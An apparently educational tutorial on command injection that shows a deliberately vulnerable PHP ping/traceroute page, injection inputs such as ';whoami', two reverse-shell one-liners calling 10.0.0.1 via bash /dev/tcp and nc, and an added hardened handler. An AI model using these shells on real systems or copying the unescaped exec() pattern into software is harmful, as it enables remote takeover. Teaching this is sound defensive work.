A command execution vulnerability occurs when a web page takes input from the user and executes it directly as a system command. By exploiting a command execution vulnerability, an attacker can execute system commands and also gain remote access to the system.

Vulnerable page

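<?php

// Initialise so the template below does not read an undefined variable on GET.
$output = array();

if($_SERVER["REQUEST_METHOD"] == "POST") {
        //print_r($_POST);
        // Both values come straight from the request body.
        $command = $_POST['command'];
        $host = $_POST['host'];
        // Vulnerable: the two values are concatenated and passed to the shell unvalidated and unescaped.
        exec($command.' '.$host, $output, $return);
        //print_r($output);
}
?>
<html>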
   
   <head>
      <title>Command Injection Vulnerability</title>
   </head>
   
   <body>
        <h1>Command Injection Vulnerability</h1>
        <form method="POST" action="">
        <select name="command">
                <option value="traceroute">traceroute</option>
                <option value="ping -c 1">ping</option>
        </select>
        <input type="text" name="host" value="8.8.8.8"/>
        <input type="submit" value="Execute!"/>
        </form>
        <?php if($output): ?>
        <?php foreach($output as $out): ?>
        <?php echo $out ?><br>
        <?php endforeach ?>
        <?php endif ?>
      <p><a href = "logout.php">Sign Out</a></p>
   </body>
   
</html>

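How to execute system commands

Because the host value is appended to the command line unescaped, a value that begins with ; ends the intended command and the shell runs whatever follows as a second command: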

;whoami
;which nc

Get shell access

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

This command can also be used:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

I have taken these scripts from pentestmonkey
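
A hardened version of the request handler in the vulnerable page above, as an added example that is not part of the original page. It assumes PHP 7.4 or later on Linux; the helper names build_argv and run_argv are hypothetical, and the allowlist keys reuse the form's existing option values.

```php
<?php
// Added example, not the original page's code. Requires PHP 7.4+ (array form of proc_open).

// The submitted 'command' value is only a lookup key; it never becomes shell text.
const ALLOWED_COMMANDS = [
    'traceroute' => ['traceroute'],
    'ping -c 1'  => ['ping', '-c', '1'],
];

// Hypothetical helper: returns the argv to run, or null when the request is rejected.
function build_argv($command, $host): ?array
{
    if (!is_string($command) || !is_string($host)) {
        return null;                              // e.g. host[]=x arrives as an array
    }
    if (!array_key_exists($command, ALLOWED_COMMANDS)) {
        return null;
    }
    $isIp = filter_var($host, FILTER_VALIDATE_IP) !== false;
    // Hostname: letters, digits, dots, hyphens; must start and end alphanumeric,
    // so shell metacharacters and option-like values ("-x") are both refused.
    $isName = preg_match('/\A[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?\z/', $host) === 1;
    if (!$isIp && !$isName) {
        return null;
    }
    return array_merge(ALLOWED_COMMANDS[$command], [$host]);
}

// Hypothetical helper: runs argv directly, without a shell, and returns output lines.
function run_argv(array $argv): array
{
    $spec = [1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'w']];
    $proc = proc_open($argv, $spec, $pipes);
    if (!is_resource($proc)) {
        return [];
    }
    $out = (string) stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return preg_split('/\R/', $out, -1, PREG_SPLIT_NO_EMPTY);
}

$output = [];
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $argv = build_argv($_POST['command'] ?? '', $_POST['host'] ?? '');
    $output = $argv === null ? ['Invalid request'] : run_argv($argv);
}
foreach ($output as $line) {
    echo htmlspecialchars($line, ENT_QUOTES, 'UTF-8'), "<br>\n";   // escape before rendering
}
```

With this handler, a host value such as ;whoami fails both the IP and the hostname check and is rejected before any process is started.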